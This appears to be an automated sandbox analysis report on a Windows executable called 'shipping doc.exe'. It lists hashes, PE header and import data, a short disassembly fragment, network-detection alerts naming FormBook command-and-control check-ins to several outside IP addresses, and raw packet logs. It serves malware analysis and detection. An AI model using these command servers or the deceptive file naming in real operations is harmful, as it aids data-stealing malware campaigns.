                                                                                            SHA-512:4D631C4786DEFF0AFDF03EDF94746E8A01C62E7F29F00CA67C3AABAFB761A66385B83D89199A1D3D2AD7C2C586C4F6A508C2E1B898CA33A9702DE5AB93A9436B
                                                                                            Malicious:false
                                                                                            Preview:.h.a.7FXG..Y..x.O;....1J...3U7FXGNESPTAFHDCO8U9352BF2H3U7.XGNKL.ZA.A.b.9...aZ+5.8A:P49*n&2>:.2h&&oJ W.\\b.}..8X"=iCHYtTAFHDCO..1..$...U...>..E.... .C....U..B....3..1$&..6.AFHDCO8U9352BF2Hc.7F.FOE.nQ.FHDCO8U9.50CM3B3U.DXGNESPTAF.BO8E935.@F2HsU7VXGNGSPQAGHDCO8P9252BF2H.W7FZGNESPTCF..CO(U9#52BF"H3E7FXGNECPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXi: +$TAF..AO8E935.@F2X3U7FXGNESPTAFHdCOXU9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF2H3U7FXGNESPTAFHDCO8U9352BF
                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.002893995961235
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:shipping doc.exe
                                                                                            File size:1'140'224 bytes
                                                                                            MD5:7ad4c6133f4f75ae91bf07f65dc5f21a
                                                                                            SHA1:abab0fed5f43a2ee988fb45b8880d50292dc9d5f
                                                                                            SHA256:9aeee1a70ae929e15e376532efa734d1a7dd5c0b0c814c3e620dcfe68e7baa96
                                                                                            SHA512:c84ce782a3d8c637f68811365a5f1c6df008ff3996fc81b75b14a582dc8cbf636d3aa5db330763cd6ad1ca5cbeca8eb7c5035ba027dcc7329b643d89b423264a
                                                                                            SSDEEP:24576:XqDEvCTbMWu7rQYlBQcBiT6rprG8aLJI1r+vgWrKA:XTvC/MTQYxsWR7aLJIl+VrK
                                                                                            TLSH:B535BF0273D1D062FFAB92334B5AF6114BBC69260123E61F13A81DB9BD705B1563E7A3
                                                                                            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                                            Icon Hash:aaf3e3e3938382a0
                                                                                            Entrypoint:0x420577
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x66340C42 [Thu May 2 21:57:22 2024 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:1
                                                                                            File Version Major:5
                                                                                            File Version Minor:1
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:1
                                                                                            Import Hash:948cc502fe9226992dce9417f952fce3
                                                                                            Instruction
                                                                                            call 00007FD76519FDF3h
                                                                                            jmp 00007FD76519F6FFh
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            push esi
                                                                                            push dword ptr [ebp+08h]
                                                                                            mov esi, ecx
                                                                                            call 00007FD76519F8DDh
                                                                                            mov dword ptr [esi], 0049FDF0h
                                                                                            mov eax, esi
                                                                                            pop esi
                                                                                            pop ebp
                                                                                            retn 0004h
                                                                                            and dword ptr [ecx+04h], 00000000h
                                                                                            mov eax, ecx
                                                                                            and dword ptr [ecx+08h], 00000000h
                                                                                            mov dword ptr [ecx+04h], 0049FDF8h
                                                                                            mov dword ptr [ecx], 0049FDF0h
                                                                                            ret
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            push esi
                                                                                            push dword ptr [ebp+08h]
                                                                                            mov esi, ecx
                                                                                            call 00007FD76519F8AAh
                                                                                            mov dword ptr [esi], 0049FE0Ch
                                                                                            mov eax, esi
                                                                                            pop esi
                                                                                            pop ebp
                                                                                            retn 0004h
                                                                                            and dword ptr [ecx+04h], 00000000h
                                                                                            mov eax, ecx
                                                                                            and dword ptr [ecx+08h], 00000000h
                                                                                            mov dword ptr [ecx+04h], 0049FE14h
                                                                                            mov dword ptr [ecx], 0049FE0Ch
                                                                                            ret
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            push esi
                                                                                            mov esi, ecx
                                                                                            lea eax, dword ptr [esi+04h]
                                                                                            mov dword ptr [esi], 0049FDD0h
                                                                                            and dword ptr [eax], 00000000h
                                                                                            and dword ptr [eax+04h], 00000000h
                                                                                            push eax
                                                                                            mov eax, dword ptr [ebp+08h]
                                                                                            add eax, 04h
                                                                                            push eax
                                                                                            call 00007FD7651A249Dh
                                                                                            pop ecx
                                                                                            pop ecx
                                                                                            mov eax, esi
                                                                                            pop esi
                                                                                            pop ebp
                                                                                            retn 0004h
                                                                                            lea eax, dword ptr [ecx+04h]
                                                                                            mov dword ptr [ecx], 0049FDD0h
                                                                                            push eax
                                                                                            call 00007FD7651A24E8h
                                                                                            pop ecx
                                                                                            ret
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            push esi
                                                                                            mov esi, ecx
                                                                                            lea eax, dword ptr [esi+04h]
                                                                                            mov dword ptr [esi], 0049FDD0h
                                                                                            push eax
                                                                                            call 00007FD7651A24D1h
                                                                                            test byte ptr [ebp+08h], 00000001h
                                                                                            pop ecx
                                                                                            Programming Language:
                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x3fa6c.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1140000x7594.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0xd40000x3fa6c0x3fc0017d0d1b3955548ba436764d2b1b25320False0.8987285539215686data7.829788782454371IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x1140000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_ICON0xd44a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                            RT_ICON0xd45c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                            RT_ICON0xd48b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                            RT_ICON0xd49d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                            RT_ICON0xd58800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                            RT_ICON0xd61280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                            RT_ICON0xd66900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                            RT_ICON0xd8c380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                            RT_ICON0xd9ce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                            RT_STRING0xda1480x594dataEnglishGreat Britain0.3333333333333333
                                                                                            RT_STRING0xda6dc0x68adataEnglishGreat Britain0.2735961768219833
                                                                                            RT_STRING0xdad680x490dataEnglishGreat Britain0.3715753424657534
                                                                                            RT_STRING0xdb1f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                            RT_STRING0xdb7f40x65cdataEnglishGreat Britain0.34336609336609336
                                                                                            RT_STRING0xdbe500x466dataEnglishGreat Britain0.3605683836589698
                                                                                            RT_STRING0xdc2b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                            RT_RCDATA0xdc4100x370d4data1.0003370407819345
                                                                                            RT_GROUP_ICON0x1134e40x76dataEnglishGreat Britain0.6610169491525424
                                                                                            RT_GROUP_ICON0x11355c0x14dataEnglishGreat Britain1.15
                                                                                            RT_VERSION0x1135700x10cdataEnglishGreat Britain0.5970149253731343
                                                                                            RT_MANIFEST0x11367c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                            DLLImport
                                                                                            WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                            VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                            MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                            WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                            PSAPI.DLLGetProcessMemoryInfo
                                                                                            IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                            USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                            UxTheme.dllIsThemeActive
                                                                                            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                                            USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                            GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                            SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                            OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishGreat Britain
                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                            05/03/24-13:21:55.842360TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977580192.168.2.43.33.130.190
                                                                                            05/03/24-13:17:09.040524TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976780192.168.2.491.195.240.19
                                                                                            05/03/24-13:15:40.646435TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.445.43.211.76
                                                                                            05/03/24-13:21:15.044041TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977380192.168.2.481.19.154.98
                                                                                            05/03/24-13:16:02.495913TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.481.88.63.46
                                                                                            05/03/24-13:20:54.448926TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977280192.168.2.4203.161.58.65
                                                                                            05/03/24-13:15:18.562499TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976280192.168.2.4185.199.110.153
                                                                                            05/03/24-13:18:53.201198TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.4199.15.163.139
                                                                                            05/03/24-13:22:16.535005TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977680192.168.2.4103.224.212.217
                                                                                            05/03/24-13:14:56.862627TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976180192.168.2.491.195.240.117
                                                                                            05/03/24-13:19:52.944033TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.481.19.154.98
                                                                                            05/03/24-13:16:25.590027TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.487.236.19.19
                                                                                            05/03/24-13:16:47.256119TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976680192.168.2.4185.215.4.42
                                                                                            05/03/24-13:21:35.663952TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977480192.168.2.489.117.27.198
                                                                                            05/03/24-13:17:49.792172TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.4199.59.243.225
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            May 3, 2024 13:13:04.355865955 CEST4434973920.190.151.9192.168.2.4
                                                                                            May 3, 2024 13:13:04.356507063 CEST49739443192.168.2.420.190.151.9
                                                                                            May 3, 2024 13:13:04.356534958 CEST4434973920.190.151.9192.168.2.4
                                                                                            May 3, 2024 13:13:04.357117891 CEST49739443192.168.2.420.190.151.9
                                                                                            May 3, 2024 13:13:04.357131958 CEST4434973920.190.151.9192.168.2.4
                                                                                            May 3, 2024 13:13:04.357172966 CEST49739443192.168.2.420.190.151.9
                                                                                            May 3, 2024 13:13:04.357189894 CEST4434973920.190.151.9192.168.2.4
                                                                                            May 3, 2024 13:13:04.564172029 CEST4434973920.190.151.9192.168.2.4
                                                                                            May 3, 2024 13:13:04.564196110 CEST4434973920.190.151.9192.168.2.4
                                                                                            May 3, 2024 13:13:04.564234972 CEST4434973920.190.151.9192.168.2.4
                                                                                            May 3, 2024 13:13:04.564275026 CEST49739443192.168.2.420.190.151.9
                                                                                            May 3, 2024 13:13:04.564290047 CEST4434973920.190.151.9192.168.2.4
                                                                                            May 3, 2024 13:13:04.564305067 CEST49739443192.168.2.420.190.151.9
                                                                                            May 3, 2024 13:13:04.564313889 CEST4434973920.190.151.9192.168.2.4
                                                                                            May 3, 2024 13:13:04.564358950 CEST49739443192.168.2.420.190.151.9
                                                                                            May 3, 2024 13:13:04.564619064 CEST49739443192.168.2.420.190.151.9
                                                                                            May 3, 2024 13:13:04.564630985 CEST4434973920.190.151.9192.168.2.4
                                                                                            May 3, 2024 13:13:04.564645052 CEST49739443192.168.2.420.190.151.9
                                                                                            May 3, 2024 13:13:04.564650059 CEST4434973920.190.151.9192.168.2.4
                                                                                            May 3, 2024 13:13:05.529843092 CEST49675443192.168.2.4173.222.162.32
                                                                                            May 3, 2024 13:13:15.139148951 CEST49675443192.168.2.4173.222.162.32
                                                                                            May 3, 2024 13:13:15.971482992 CEST49744443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:15.971529007 CEST44349744172.217.165.132192.168.2.4
                                                                                            May 3, 2024 13:13:15.971605062 CEST49744443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:15.976264954 CEST49745443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:15.976301908 CEST44349745172.217.165.132192.168.2.4
                                                                                            May 3, 2024 13:13:15.976367950 CEST49745443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:15.977263927 CEST49745443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:15.977278948 CEST44349745172.217.165.132192.168.2.4
                                                                                            May 3, 2024 13:13:15.978389025 CEST49744443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:15.978401899 CEST44349744172.217.165.132192.168.2.4
                                                                                            May 3, 2024 13:13:16.025372982 CEST49746443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:16.025413036 CEST44349746172.217.165.132192.168.2.4
                                                                                            May 3, 2024 13:13:16.025616884 CEST49746443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:16.026120901 CEST49747443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:16.026149988 CEST44349747172.217.165.132192.168.2.4
                                                                                            May 3, 2024 13:13:16.026206017 CEST49747443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:16.026426077 CEST49746443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:16.026442051 CEST44349746172.217.165.132192.168.2.4
                                                                                            May 3, 2024 13:13:16.026613951 CEST49747443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:16.026626110 CEST44349747172.217.165.132192.168.2.4
                                                                                            May 3, 2024 13:13:16.168441057 CEST44349744172.217.165.132192.168.2.4
                                                                                            May 3, 2024 13:13:16.168682098 CEST49744443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:16.168708086 CEST44349744172.217.165.132192.168.2.4
                                                                                            May 3, 2024 13:13:16.169859886 CEST44349744172.217.165.132192.168.2.4
                                                                                            May 3, 2024 13:13:16.169946909 CEST49744443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:16.171629906 CEST49744443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:16.171701908 CEST44349744172.217.165.132192.168.2.4
                                                                                            May 3, 2024 13:13:16.171816111 CEST49744443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:16.171823978 CEST44349744172.217.165.132192.168.2.4
                                                                                            May 3, 2024 13:13:16.173342943 CEST44349745172.217.165.132192.168.2.4
                                                                                            May 3, 2024 13:13:16.175082922 CEST49745443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:16.175105095 CEST44349745172.217.165.132192.168.2.4
                                                                                            May 3, 2024 13:13:16.176217079 CEST44349745172.217.165.132192.168.2.4
                                                                                            May 3, 2024 13:13:16.176286936 CEST49745443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:16.176697016 CEST49745443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:16.176764011 CEST44349745172.217.165.132192.168.2.4
                                                                                            May 3, 2024 13:13:16.176850080 CEST49745443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:16.176856041 CEST44349745172.217.165.132192.168.2.4
                                                                                            May 3, 2024 13:13:16.213011980 CEST44349746172.217.165.132192.168.2.4
                                                                                            May 3, 2024 13:13:16.213336945 CEST49746443192.168.2.4172.217.165.132
                                                                                            May 3, 2024 13:13:16.213356972 CEST44349746172.217.165.132192.168.2.4
                                                                                            May 3, 2024 13:13:16.214416027 CEST44349746172.217.165.132192.168.2.4
